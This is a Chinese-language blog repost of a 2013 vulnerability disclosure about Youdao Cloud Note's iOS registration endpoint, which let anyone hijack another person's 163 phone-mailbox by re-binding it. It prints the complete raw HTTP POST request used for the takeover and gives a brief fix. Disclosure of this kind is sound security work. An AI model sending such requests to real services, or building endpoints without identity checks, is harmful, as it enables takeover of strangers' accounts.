记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网易手机邮箱任意密码重置强行绑定

2013-02-25 12:35
一直在关注移动终端的安全.各大企业的APP成了我关注的对象.非常喜欢网易的有道云笔记.于是对其IOS客户端进行了一次测试.发现了一个可以重置密码并且强行解绑手机邮箱的接口.
 
有道云笔记的手机注册功能.由于注册的是163的邮箱,没有独立出来,所以导致163的手机邮箱受到波及.在注册的前几步会有验证码验证等机制,但在最后一步的时候.仅仅是提交了手机号码和密码两个有效数据,没有其他任何身份认证的信息被提交.这时候我更改了其他手机号做了测试.发现同样可以修改其他手机邮箱的密码.包文如下
 
 
POST /noteproxy/register HTTP/1.1
Host: m.note.youdao.com
User-Agent: ynote-iphone
Content-Length: 63
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip
Cookie: 
Connection: close
Proxy-Connection: close
 
phoneNum=13333333333&format=json&password=123456&confirm=123456
 
接口没做任何验证.可以直接修改对应手机邮箱的密码.
 
但经过一系列的尝试后发现.并非是真实修改了对方的密码.
 
手机邮箱是个独立的服务.会给一个普通邮箱帐号绑定一个手机号码作为邮箱地址.
 
这个操作会重新给这个手机号绑定一个新生成的邮箱.
 
也就是说.并非修改了原帐号密码.而是注册了一个新的帐号.并且绑定了原主人的手机邮箱.
 
原主人手机会收到一条被解绑的短信.但是此时自己的手机邮箱已经被劫持走了.
 
危害不言而喻.
 
 
 
修复方案:

坚信.每次提交都是不安全的.每次提交都要做身份验证. 
 
知识来源: www.2cto.com/Article/201302/190981.html

阅读:106775 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“网易手机邮箱任意密码重置强行绑定”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云